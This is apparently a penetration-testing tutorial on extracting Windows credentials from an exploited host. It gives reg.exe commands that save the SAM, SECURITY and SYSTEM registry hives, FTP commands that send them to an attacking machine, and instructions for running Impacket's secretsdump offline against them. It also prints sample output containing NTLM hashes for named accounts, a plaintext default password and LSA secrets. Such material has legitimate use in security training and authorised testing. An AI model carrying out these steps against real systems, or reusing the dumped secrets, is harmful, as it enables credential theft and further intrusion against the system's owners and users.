This is similar to the hashdump command in the Metasploit Framework (frowned upon by OffSec). On the exploited Windows system, run the following from an elevated command prompt (saving the SAM and SECURITY hives requires administrative privileges):
C:\> reg.exe save hklm\sam sam
C:\> reg.exe save hklm\security security
C:\> reg.exe save hklm\system system
Then transfer these files to your attacking machine, e.g. using FTP:
ftp> bin
200 TYPE is now 8-bit binary
ftp> put system
200 PORT command successful
ftp> put security
200 PORT command successful
ftp> put sam
200 PORT command successful
The bin command is essential: it switches the transfer to binary mode, and without it ASCII mode mangles the hive files in transit, so the next step fails. Next, run Impacket's secretsdump.py offline against the three saved hives (its -sam, -security and -system options with the LOCAL target in place of a remote host). The output looks like this:
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies
[*] Target system bootKey: 0x371c6e102028a5b0e79ccc268d721c26
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f53ac7dfad4fe8c3e632e6d3becdccd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:11e102c7f485f3e21f5ca486c7d85b4c:::
kevin:1000:aad3b435b51404eeaad3b435b51404ee:3164f206290117d74e9fa582139828d4:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:173cf47d45ff85470ccd9c4bd609c518:::
trevelyn:1003:aad3b435b51404eeaad3b435b51404ee:7213b1af7ba9bfea55d6305a0a6686f5:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):r4UBwM8sSx
[*] DPAPI_SYSTEM
0000 01 00 00 00 CC 5F BF 2F 58 69 C0 13 E9 00 2B A9 ....._./Xi....+.
0010 E7 95 6D 7C 68 4B 7C C1 23 E2 DE 6F 48 70 31 8E ..m|hK|.#..oHp1.
0020 96 26 83 EC 16 98 BD 9F ED 01 EE 7C .&.........|
DPAPI_SYSTEM:01000000cc5fbf2f5869c013e9002ba9e7956d7c684b7cc123e2de6f4870318e962683ec1698bd9fed01ee7c
[*] NL$KM
0000 BC 28 86 EE C0 B6 91 0A 8C 2D 84 63 A0 BE 36 B7 .(.......-.c..6.
0010 56 38 88 99 72 53 44 DC 51 CE F5 51 D1 4E 37 B8 V8..rSD.Q..Q.N7.
0020 2E 28 23 C5 70 BB 5E EB 13 38 9D 42 8E B1 17 6A .(#.p.^..8.B...j
0030 E2 89 4E CF AB 6F 73 CE 1D 0E 8B BA 58 D0 1E 72 ..N..os.....X..r
NL$KM:bc2886eec0b6910a8c2d8463a0be36b756388899725344dc51cef551d14e37b82e2823c570bb5eeb13389d428eb1176ae2894ecfab6f73ce1d0e8bba58d01e72
[*] Cleaning up...